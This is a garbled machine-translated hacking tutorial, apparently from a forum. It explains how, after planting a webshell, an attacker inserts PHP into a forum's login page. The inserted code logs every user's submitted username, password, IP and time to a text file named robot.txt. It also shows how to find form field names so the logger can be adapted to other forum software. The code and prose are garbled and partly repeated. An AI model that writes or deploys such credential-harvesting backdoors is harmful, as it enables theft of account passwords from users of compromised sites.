Intercept the php background login password code. After obtaining webshell, it is difficult to crack the password for further penetration, such as discuz, instead of using md5 encryption directly. I used to write it for big data once. yesterday, little brother pig was very easy to use. after getting the webshell, he wanted to further penetrate the password, for example, discuz, instead of using md5 encryption directly. it was very difficult to crack it. I used to write it for big data once. I wrote it again yesterday when the big brother pig was easy to use. The code is relatively simple. in a few words, I will explain the principle in detail and take care of some friends who do not know much about php. If ($ _ POST [loginsubmit]! =) {// Determine whether the login button is clicked $ sb = user :. $ _ POST [username]. -- passwd :. $ _ POST [password]. -- ip :. $ HTTP_SERVER_VARS [REMOTE_ADDR]. --. date (Y-m-d H: I: s ). rn; // concatenate the value received by POST and assign the value to the variable $ sb fwrite(fopen(robot.txt, AB), $ sb);} // write the result into a file for a brief analysis, take the login page of China as an example. Right-click bbs.xxx.com/login.php and right-click it to view the source code. press CTRL + F to search for action and find the login form. I only copied the key code. // The value after the action is the address submitted by the form, which will process login. for example, to determine whether the password is correct or not, the method is POST, so it is received with $ _ POST. .... Powerful ellipsis ......Account (
U):
// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. to intercept the Chinese password, change it to $ _ POST [pwuser].Password (
P):
// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. to intercept the Chinese password, change it to $ _ POST [pwpwd].
Bytes. I used to write for the big data once. yesterday, the big brother pig was very easy to use ,...